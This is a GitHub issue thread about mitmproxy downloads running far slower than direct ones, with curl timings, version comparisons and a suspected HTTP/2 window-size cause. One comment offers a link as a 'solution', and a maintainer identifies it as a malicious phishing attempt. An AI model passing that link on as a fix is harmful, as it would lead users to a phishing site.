### ISSUE TITLE
Downloading files takes a lot of time

### ISSUE THREAD

**Issue by SinghNanak** [mitmproxy/mitmproxy#7271]
#### Problem Description
Downloading a file using any proxy mode takes miserably long time. Turning on steaming takes even more time.  
 
#### Steps to reproduce the behavior:
1. Download latest mitmproxy 11
2. execute the binary `./mitmproxy`
3. download any file any format

#### System Information
```
$ ./mitmproxy --version
Mitmproxy: 11.0.0 binary
Python:    3.12.6
OpenSSL:   OpenSSL 3.3.2 3 Sep 2024
Platform:  Linux-6.11.3-200.fc40.x86_64-x86_64-with-glibc2.39
```
#### Download Speed test from curl
Proxy Disabled
```
$ curl -kO https://downloads.mitmproxy.org/11.0.0/mitmproxy-11.0.0-linux-x86_64.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  143M  100  143M    0     0  20.4M      0  0:00:07  0:00:07 --:--:-- 24.7M
```
Proxy Enabled
```
$ curl -kO --socks5 127.0.0.1:1080 https://downloads.mitmproxy.org/11.0.0/mitmproxy-11.0.0-linux-x86_64.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  143M  100  143M    0     0   477k      0  0:05:07  0:05:07 --:--:-- 37.9M

```

**Comment by Prinzhorn** [comment]
> Download latest mitmproxy 11
> Mitmproxy: 10.4.2 binary

This does not add up. Feel free to re-open if it actually happens with the latest release.

**Comment by SinghNanak** [comment]
@Prinzhorn sorry i pasted the System Information version.

**Comment by Prinzhorn** [comment]
Can confirm:

1. 0:03 without mitmproxy
2. 1:42 with `mitmdump --mode socks5`
3. 1:28 with `mitmdump --mode socks5 --set stream_large_bodies=0`
4. 1:45 with `mitmdump`
5. 1:27 with `mitmdump --set stream_large_bodies=0`

For reference for regular `mitmdump`

1. `v10.4.2` 2:34
2. `v10.0.0` >3:00 (I'm impatient and cancelled it)
3. `v9.0.1` >3:00 (I'm impatient and cancelled it)
4. `v8.1.1` >2:00 (I'm impatient and cancelled it)
5. `v7.0.4` >2:00 (I'm impatient and cancelled it)
6. `v6.0.2` >2:00 (I'm impatient and cancelled it)

@mhils it seems like this is still an issue, albeit it has gotten a little better with >=10.4.2? Can you confirm this on other platforms? I'm on Ubuntu.

**Comment by mhils** [comment]
I agree that performance is clearly not acceptable and something we need to fix.

**Comment by AchilleasTsiamoulis** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by mhils** [comment]
Please do not click on the link shared by @AchilleasTsiamoulis, this is not a solution for this problem but a malicious phishing attempt.

**Comment by sujaldev** [comment]
Fwiw, it seems to work fine with http/1.x

**Comment by anchal00** [comment]
Hii @sujaldev you're right. I did a little bit of testing on my own and I figured that this problem is relating to HTTP/2 only. Downloads with HTTP/1.1 is working quite fine for me.
@mhils my understanding of HTTP/2 is very limited and I speculate that the window sizes chosen during transmission could be potential issue

**Comment by anchal00** [comment]
Hii @sujaldev you're right. I did a little bit of testing on my own and I figured that this problem is relating to HTTP/2 only. Download with HTTP/1.1 is working quite fine for me.

**Comment by mhils** [comment]
Thanks, that's a very useful pointer. We should figure out what we are constrained by: Is a CPU core maxed out because we have quadratic behavior somewhere? Or does increasing HTTP/2 window sizes help?

(I don't have capacity to look into this at the moment, help is greatly appreciated :))
